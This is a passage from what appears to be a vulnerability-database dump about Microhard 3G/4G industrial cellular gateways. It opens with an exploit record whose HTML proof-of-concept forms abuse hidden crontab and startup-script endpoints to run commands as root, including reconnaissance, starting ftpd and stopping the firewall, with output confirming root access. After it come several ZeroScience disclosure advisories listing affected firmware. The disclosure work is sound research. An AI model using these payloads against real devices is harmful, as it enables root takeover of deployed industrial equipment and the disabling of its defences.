collection.\r\nFrom remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!\r\nThe IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It\r\nprovides robust and secure wireless communication of Serial, USB and Ethernet data.\r\n \r\nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength\r\nwireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things\r\nto the next level by providing features such as Ethernet with PoE, RS232 Serial port\r\nand 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated\r\nFirewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution\r\nworth looking at!\r\n \r\nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength\r\nwireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote\r\ncellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight\r\nsystem integration and design flexibility with dual Ethernet Ports and high power\r\n802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access\r\nControl Lists, the Dragon-LTE provides a solution for any cellular application!\r\n \r\nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE\r\nnetwork infrastructure for critical data communications. The VIP4Gb provides simultaneous\r\nnetwork connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital\r\nI/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in\r\nany application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.\r\nIt provides robust and secure wireless communication of Serial, Ethernet & WiFi data.\r\n \r\nDesc: The application suffers from multiple authenticated arbitrary remote code execution\r\nvulnerabilities with highest privileges. This is due to multiple hidden and undocumented\r\nfeatures within the admin interface that allows an attacker to create crontab jobs and/or\r\nmodify the system startup script that allows execution of arbitrary code as root user.\r\n \r\nTested on: httpd-ssl-1.0.0\r\n Linux 2.6.32.9 ([email\u00a0protected]) (gcc version 4.4.3)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2018-5479\r\nAdvisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5479.php\r\n \r\n \r\n13.03.2018\r\n \r\n--\r\n \r\n \r\nCrontab #1:\r\n-----------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-crontabs.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"sltMinutes\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltHours\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDays\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltMonths\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDaysOfWeek\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthMinutes\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthHours\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthDays\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthMonths\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthDaysOfWeek\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXminute\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXhour\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXday\" value=\"\" />\r\n <input type=\"hidden\" name=\"txtCommand\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthCronEnabled\" value=\"0\" />\r\n <input type=\"hidden\" name=\"txtCrontabEntry\" value=\"\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg02e2c8\" value=\"*/3\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg02e2c8\" value=\"/etc/init.d/ntpclient start\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg02e2c8\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg04b4e9\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg04b4e9\" value=\"id > /www/pwn.txt\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg04b4e9\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"HOURS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"DAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"MONTHS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"COMMAND_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"ENABLED_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"action\" value=\"Save Changes\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n---\r\n \r\ncurl http://192.168.1.1/pwn.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\nStart ftpd:\r\n-----------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-startup.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"path\" value=\"/etc/init.d\" />\r\n <input type=\"hidden\" name=\"edit\" value=\"custom-user-startup\" />\r\n <input type=\"hidden\" name=\"filecontent\" value=\"#!/bin/sh /etc/rc.common\r\nSTART=90\r\n# place your own startup commands here\r\n#\r\n# REMEMBER: You *MUST* place an '&' after launching programs you \r\n# that are to continue running in the background.\r\n#\r\n# i.e. \r\n# BAD: upnpd\r\n# GOOD: upnpd &\r\n# \r\n# Failure to do this will result in the startup process halting\r\n# on this file and the diagnostic light remaining on (at least\r\n# for WRT54G(s) models).\r\n#\r\n \r\nftpd &\r\n \r\n\" />\r\n <input type=\"hidden\" name=\"save\" value=\"\u00c2 Save Changes\u00c2 \" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n \r\nCrontab #2:\r\n-----------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-crontabs.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"sltMinutes\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltHours\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDays\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltMonths\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDaysOfWeek\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthMinutes\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthHours\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthDays\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthMonths\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthDaysOfWeek\" value=\"*\" />\r\n <input type=\"hidden\" name=\"ddEveryXminute\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXhour\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXday\" value=\"\" />\r\n <input type=\"hidden\" name=\"txtCommand\" value=\"uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt\" />\r\n <input type=\"hidden\" name=\"chkCronEnabled\" value=\"on\" />\r\n <input type=\"hidden\" name=\"txthCronEnabled\" value=\"1\" />\r\n <input type=\"hidden\" name=\"txtCrontabEntry\" value=\"* * * * * uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg02e2c8\" value=\"*/3\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg02e2c8\" value=\"/etc/init.d/ntpclient start\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg02e2c8\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg0421ec\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg0421ec\" value=\"uname -a >/www/os.txt ; ls -la /www >> /www/os.txt ; id >> /www/os.txt\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg0421ec\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"HOURS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"DAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"MONTHS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"COMMAND_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"ENABLED_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"action\" value=\"Save Changes\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n---\r\n \r\ncurl http://192.168.1.1/os.txt\r\nLinux IPn4G 2.6.32.9 #1 Mon Jun 20 15:28:30 MDT 2016 mips GNU/Linux\r\ndrwxr-xr-x 5 root root 0 Jul 1 14:01 .\r\ndrwxr-xr-x 7 root root 0 Dec 31 1969 ..\r\n-rw-r--r-- 1 root root 4 Apr 12 2010 .version\r\n-rw-r--r-- 1 root root 13461 May 8 15:54 IPn4G.config\r\ndrwxr-xr-x 3 root root 0 Jun 20 2016 cgi-bin\r\n-rw-r--r-- 1 root root 2672 Apr 1 2010 colorize.js\r\n-rwxr-xr-x 1 root root 3638 May 10 2010 favicon.ico\r\ndrwxr-xr-x 2 root root 959 Jun 20 2016 images\r\n-rw-r--r-- 1 root root 600 Feb 12 2013 index.html\r\ndrwxr-xr-x 2 root root 224 Jun 20 2016 js\r\n-rw-r--r-- 1 root root 68 Mar 1 14:09 os.txt\r\ndrwxr-xr-x 2 root root 79 Jun 20 2016 svggraph\r\ndrwxr-xr-x 2 root root 0 Jul 1 14:02 themes\r\ndrwxr-xr-x 2 root root 0 May 8 16:21 vnstat\r\n-rw-r--r-- 1 root root 953 Apr 1 2010 webif.js\r\nuid=0(root) gid=0(root) groups=0(root)\r\n \r\n \r\nDisable firewall:\r\n-----------------\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/cgi-bin/webif/system-crontabs.sh\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"hidden\" name=\"submit\" value=\"1\" />\r\n <input type=\"hidden\" name=\"sltMinutes\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltHours\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDays\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltMonths\" value=\"\" />\r\n <input type=\"hidden\" name=\"sltDaysOfWeek\" value=\"\" />\r\n <input type=\"hidden\" name=\"txthMinutes\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthHours\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthDays\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthMonths\" value=\"*\" />\r\n <input type=\"hidden\" name=\"txthDaysOfWeek\" value=\"*\" />\r\n <input type=\"hidden\" name=\"ddEveryXminute\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXhour\" value=\"\" />\r\n <input type=\"hidden\" name=\"ddEveryXday\" value=\"\" />\r\n <input type=\"hidden\" name=\"txtCommand\" value=\"/etc/init.d/firewall stop\" />\r\n <input type=\"hidden\" name=\"chkCronEnabled\" value=\"on\" />\r\n <input type=\"hidden\" name=\"txthCronEnabled\" value=\"1\" />\r\n <input type=\"hidden\" name=\"txtCrontabEntry\" value=\"* * * * * /etc/init.d/firewall stop\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg02e2c8\" value=\"*/3\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg02e2c8\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg02e2c8\" value=\"/etc/init.d/ntpclient start\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg02e2c8\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"HOURS_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"DAYS_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"MONTHS_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_cfg04f65b\" value=\"*\" />\r\n <input type=\"hidden\" name=\"COMMAND_cfg04f65b\" value=\"/etc/init.d/firewall stop\" />\r\n <input type=\"hidden\" name=\"ENABLED_cfg04f65b\" value=\"1\" />\r\n <input type=\"hidden\" name=\"MINUTES_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"HOURS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"DAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"MONTHS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"WEEKDAYS_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"COMMAND_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"ENABLED_newCron\" value=\"\" />\r\n <input type=\"hidden\" name=\"action\" value=\"Save Changes\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\n\n# 0day.today [2018-07-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30740"}], "zeroscience": [{"lastseen": "2019-03-20T18:09:42", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download \nAdvisory ID: [ZSL-2018-5484](<ZSL-2018-5484.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Privilege Escalation, Exposure of Sensitive Information, DoS, Security Bypass \nRisk: (4/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe system backup configuration file 'IPn4G.config' in '/' directory or its respective name based on the model name including the similar files in '/www/cgi-bin/system.conf', '/tmp' and the cli.conf in '/etc/m_cli/' can be downloaded by an authenticated attacker in certain circumstances. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and/or full system access. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_config.txt](<../../codes/microhard_config.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45036/> \n[2] <https://packetstormsecurity.com/files/148573> \n[3] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146623> \n[4] <https://cxsecurity.com/issue/WLB-2018070164>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5484", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5484.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Configuration Download", "type": "zeroscience", "sourceData": "REQUEST LIMIT REACHED", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_config.txt"}, {"lastseen": "2019-05-11T13:19:04", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks \nAdvisory ID: [ZSL-2018-5485](<ZSL-2018-5485.php>) \nType: Local/Remote \nImpact: Exposure of System Information, Privilege Escalation, Exposure of Sensitive Information, DoS, Security Bypass, Manipulation of Data \nRisk: (5/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nDue to the hidden and undocumented File Editor (Filesystem Browser) shell script 'system-editor.sh' an attacker can leverage this issue to read, modify or delete arbitrary files on the system. Input passed thru the 'path' and 'savefile', 'edit' and 'delfile' GET and POST parameters is not properly sanitized before being used to modify files. This can be exploited by an authenticated attacker to read or modify arbitrary files on the affected system. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_fd.txt](<../../codes/microhard_fd.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://cxsecurity.com/issue/WLB-2018070165> \n[2] <https://packetstormsecurity.com/files/148574> \n[3] <https://www.exploit-db.com/exploits/45037/> \n[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146626>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5485", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2018-5485.php", "title": "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Arbitrary File Attacks", "type": "zeroscience", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/microhard_fd.txt"}, {"lastseen": "2019-03-25T17:34:03", "bulletinFamily": "exploit", "description": "Title: Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities \nAdvisory ID: [ZSL-2018-5478](<ZSL-2018-5478.php>) \nType: Local/Remote \nImpact: Cross-Site Scripting \nRisk: (3/5) \nRelease Date: 17.07.2018 \n\n\n##### Summary\n\nThe new IPn4Gb provides a rugged, industrial strength wireless solution using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial RS232/485/422 devices! \n \nThe IPn3Gb provides a fast, secure industrial strength wireless solution that uses the widespread deployment of cellular network infrastructure for critical data collection. From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers! The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It provides robust and secure wireless communication of Serial, USB and Ethernet data. \n \nThe all new Bullet-3G provides a compact, robust, feature packed industrial strength wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things to the next level by providing features such as Ethernet with PoE, RS232 Serial port and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution worth looking at! \n \nThe all new Dragon-LTE provides a feature packed, compact OEM, industrial strength wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight system integration and design flexibility with dual Ethernet Ports and high power 802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access Control Lists, the Dragon-LTE provides a solution for any cellular application! \n \nThe new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE network infrastructure for critical data communications. The VIP4Gb provides simultaneous network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network. It provides robust and secure wireless communication of Serial, Ethernet & WiFi data. \n\n##### Description\n\nThe application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. \n\n##### Vendor\n\nMicrohard Systems Inc. - <http://www.microhardcorp.com>\n\n##### Affected Version\n\nIPn4G 1.1.0 build 1098 \nIPn3Gb 2.2.0 build 2160 \nIPn4Gb 1.1.6 build 1184-14 \nIPn4Gb 1.1.0 Rev 2 build 1090-2 \nIPn4Gb 1.1.0 Rev 2 build 1086 \nBullet-3G 1.2.0 Rev A build 1032 \nVIP4Gb 1.1.6 build 1204 \nVIP4G 1.1.6 Rev 3.0 build 1184-14 \nVIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196 \nIPn3Gii / Bullet-3G 1.2.0 build 1076 \nIPn4Gii / Bullet-LTE 1.2.0 build 1078 \nBulletPlus 1.3.0 build 1036 \nDragon-LTE 1.1.0 build 1036 \n\n##### Tested On\n\nhttpd-ssl-1.0.0 \nLinux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3) \n\n##### Vendor Status\n\n[13.03.2018] Vulnerability discovered. \n[13.03.2018] Vendor contacted. \n[09.05.2018] No response from the vendor. \n[10.05.2018] Vendor contacted again. \n[24.05.2018] No response from the vendor. \n[25.05.2018] Vendor contacted again. \n[16.07.2018] No response from the vendor. \n[17.07.2018] Public security advisory released. \n\n##### PoC\n\n[microhard_csrf.txt](<../../codes/microhard_csrf.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://www.exploit-db.com/exploits/45034/> \n[2] <https://exchange.xforce.ibmcloud.com/vulnerabilities/146624> \n[3] <https://cxsecurity.com/issue/WLB-2018070168> \n[4] <https://packetstormsecurity.com/files/148562>\n\n##### Changelog\n\n[17.07.2018] - Initial release \n[23.07.2018] - Added reference [1], [2], [3] and [4] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "modified": "2018-07-17T00:00:00", "published": "2018-07-17T00:00:00", "id": "ZSL-2018-5478", "href": 